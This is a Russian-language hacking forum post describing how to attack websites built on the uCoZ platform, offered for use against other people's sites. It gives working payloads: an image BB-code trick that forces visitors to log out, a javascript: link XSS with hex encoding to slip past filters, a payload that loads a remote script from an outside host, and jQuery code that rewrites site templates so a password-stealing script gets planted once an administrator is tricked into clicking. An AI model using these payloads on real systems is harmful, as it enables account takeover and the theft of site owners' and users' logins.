Уязвимости UCoZ

tickhack

BANNED
Messages
66
Reputation
1
Reaction score
12
Points
8
Please note, if you want to make a deal with this user, that it is blocked.
Существует такая система для клепания сайтов под названием uCoz. Пользуются ей в основном те, кто не знаком с такими окуенно сложными вещами как Joomla, DLE и пр. — школота. Но прогуливаясь по просторам интернета часто натыкаешься на эти чудо-сайты. И иногда просто хочется взять и развидеть это го*но. Собственно пару способов это сделать можно узнать под катом.

Первая уязвимость: BB код
Сама уязвимость заключается в возможности «подгрузки» не картинки, а чего-нибудь другого. К примеру страницы выхода из аккаунта, которая располагается по адресу адрес_сайта/index/10:
[CODE][I M G]http://адрес_сайта/index/10?.jpg[/I M G][/CODE]
Кидаем себе в подпись или, что лучше, кидаем в чат и наслаждаемся зрелищем. Кучка школьников наверняка где-то пробует войти в свой профиль, тут же выходит из него и ловит окуенные баттхёрты ^__^.

Вторая уязвимость: BB код [U R L]
Учитывая, что на козе хостятся более миллиона сайтов смешной является уязвимость, которая даёт возможность использовать псевдопротокол «javascript:». Что смешно, не проверяется даже является ли строка ссылкой вообще >_<. И так, значит пытаемся вставить наш мего вредоносный скрипт на сайт:
[CODE][U R L=javascript:alert('КулХАцкер!')]Не нажимать.[/U R L][/CODE]

и хер, ибо кавычки и скобки всё-таки фильтруются. Заменяем HEX аналогами:
[CODE][U R L=javascript:alert%28%27КулХацкер!%27%29]Не нажимать[/U R L][/CODE]

и всё работает. Для надёжности заменяется весь скрипт HEX аналогами. Таким образом можно запускать произвольный JS код на сайте-жертве. К примеру так:

[CODE][U R L=javascript:%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%65%73%74%2E%63%6F%6D%2F%62%61%64%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B]Не нажимать.[/U R L][/CODE]

Или в читаемом виде

[CODE][U R L=javascript:document.write('<script src="http://test.com/bad.js"></script>');]Не нажимать[/U R L][/CODE]
Собственно, а как это использовать?

Используя jQuery конструкции вида
[CODE]/*Получаем исходник шаблона страницы*/
$.get('/tmpls/?a=tmpl;m=3;t=3', function (o) {
/*Делаем POST запрос с новыми параметрами*/
$.post('/tmpls/', {
//как угодно изменяем шаблон до этой функции или прямо тут через регэкспы
//а далее подставляем нужные параметры
tmpl: $('textarea[name="tmpl"]', o).val(),
a: 'tmpl',
t: '3',
m: '3',
tt: '1',
ssid: $('input[name="ssid"]', o).val()
});
});
/*Вообщем обычные GET и POST запросы с нужными вам параметрами*/[/CODE]
у вас есть также возможность удалённо с помощью скрипта, который вы внедрите, изменять шаблоны различных страниц сайта. Это, можно считать, отдельная уязвимость. Так вот, вы можете внедрить в любой шаблон скрипт по отправке полей «имя» и «пароль» по нажатию на кнопку «вход». Для этого киньте админу в личку скрипт, для установки скрипта, собирающего пароли на сайт. Подождите пока он нажмёт на ссылку. И собирайте логины. Уже через логины можно получить доступ к сайтам на укозе конкретных пользователей, а также к другим (возможно) сайтам на которых пользователь зареген через их почту.

[COLOR="Red"]В тегах U R L и I M G убрать пробелы.[/COLOR]
Автор статьи : TickHack
 
Top